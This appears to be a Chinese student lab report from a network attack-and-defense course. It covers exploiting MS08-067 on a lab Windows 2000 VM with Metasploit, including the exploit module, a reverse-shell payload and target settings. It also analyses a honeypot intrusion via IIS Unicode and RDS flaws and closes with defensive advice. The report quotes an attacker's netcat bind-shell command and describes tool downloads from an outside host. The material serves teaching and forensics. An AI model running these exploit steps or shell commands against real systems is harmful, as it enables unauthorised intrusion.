20232802 2023-2024-2 《网络攻防实践》实践六报告
一、实践过程
1.动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。
1)在 Kali 攻击机终端使用以下命令进入 Metasploit:
sudo apt-get install metasploit-framework
msfconsole
输入use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本,使用show payloads显示可用的攻击负载,set payload generic/shell_reverse_tcp选择你要用的攻击负载模块:
使用show options查看需要设置的参数:
使用set RHOST 192.168.200.124设置靶机为win2k,set LHOST 192.168.200.2设置攻击机为kali,再输入exploit开始攻击。攻击成功之后输入若干命令进行测试:
可以使用Wireshark捕获攻击过程产生的数据包:
2.取证分析实践:解码一次成功的NT系统破解攻击
[来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
1、攻击者使用了什么破解工具进行攻击
2、攻击者如何使用这个破解工具进入并控制了系统
3、攻击者获得系统访问权限后做了什么
4、我们如何防止这样的攻击
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么]
使用wireshark打开snort-0204@0117.log文件,大致浏览文件后,可以发现日志文件由以下内容组成:
可识别的HTTP协议内容
可识别的SQL语言代码内容
可识别的系统操作代码内容
不可识别的数据(二进制数据)
(1)攻击者使用了什么破解工具进行攻击
攻击者利用了Unicode攻击(针对MS00-078/MS01-026)和针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
分析:
追踪HTTP数据流,找到特殊字符%C0%AF,在Unicode编码中对应符号/,因此可以推测存在UNICODE编码漏洞攻击,说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况:
再往下,可以看到攻击者试图向服务器获取一个msadcs.dll文件:
攻击者利用这个dll存在RDS漏洞,输入了个数据查询语句进行SQL注入攻击。根据“ADM!ROX!YOUR!WORLD”特征字符串,以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,通过查询可以知道到它是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码发起的
至此,攻击者通过查点确认了目标系统提供 Web 服务的是IIS v4.0,并存在Unicode和RDS安全漏洞,可进行进一步渗透攻击。
(2)攻击者如何使用这个破解工具进入并控制了系统
观察到每次 RDS 渗透攻击间的间隔时间均为 6秒左右,可以推测攻击者是预先写好需执行的 shell 指令列表,然后由 msadc(2).pl 渗透攻击工具一起执行。可以发现攻击者并没有成功,之后便又开始转向 Unicode 攻击,每条请求间隔时间大概在 10-12 秒,意味着指令可能是由攻击者手工输入的。
攻击者就成功进入了系统之后,继续往下看,可以发现攻击者建立了一个ftp连接,但是可以看到请求间隔时间大概在 10-12 秒,意味着这些指令可能是由攻击者手工输入的,而且输入了多次才输入正确。
蜜罐主机连接 213.116.251.162 并下载了所指定的这些文件,并通过 nc构建其一个远程 shell 通道。cmd1.exe /c nc -l -p 6969 -e cmd1.exe接着,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段
(3)攻击者获得系统访问权限后做了什么
从下图的tcp流可以看到攻击者的行为:
对目标主机的文件系统进行了嗅探并删除了一些文件:
并试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的
(4)我们如何防止这样的攻击
这个攻击事件中被利用的两个漏洞为RDS和Unicode漏洞,两者都已经有相应的补丁,通过打补丁可防止遭受同样的攻击。不要使用 IIS4.x 这样臭名昭著的 Web Server,如果必须使用 IIS4.x,主要的防范措施有:
为这些漏洞打上补丁,
禁用用不着的 RDS 等服务,
防火墙封禁网络内部服务器发起的连接
为 web server 在单独的文件卷上设置虚拟根目录
使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能
使用 IIS Lockdown 和 URLScan 等工具加强 web serve
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
攻击者意识到了攻击目标是蜜罐主机,因为他建立了一个文件,并输入了如下内容 C:>echo best honeypot i’ve seen till now 😃 > rfp.txt
因为该目标主机作为 rfp 的个人网站, Web 服务所使用的 IIS 甚至没有更新 rfp 自己所发现的 MDAC RDS安全漏洞,很容易让攻击者意识到这绝对是台诱饵
3.团队对抗实践:windows系统远程渗透攻击和分析
1.攻击实践:
实践环境:
攻击机Kali:192.168.85.193(20232802黄千里)
靶机Win2k:192.168.85.62(20232801刘莹)
依照任务一步骤,进行攻击
创建文件hql,在同伴的win2k虚拟机192.168.85.62(20232801刘莹)创建结果如下
2.靶机实践:
实践环境:
攻击机Kali:192.168.85.223(20232801刘莹)
靶机Win2k:192.168.85.53(20232802黄千里)
二、学习中遇到的问题及解决
- 问题1:实验1中开始时攻击不成功
- 问题1解决方案:开始时攻击机的网络模式为NAT模式,靶机使用仅主机模式,处于不同网段,将两台主机调整至同一网段之后便可以进行攻击。
- 问题2:win2k虚拟机换成桥接模式后ip地址没有变 ,无法与攻击机相连通
- 问题2解决方案:在win2k虚拟机中将ip获取方式设置为自动获取方式,并与攻击机处在同一局域网中即可连接。
三、实践总结
本次实验动手实践了使用msf渗透主机的全过程,了解了这个工具的使用。还仔细分析了一次成功的NT系统破解攻击,初步理解了攻击过程。并实践了团队对抗,是非常有意思的体验。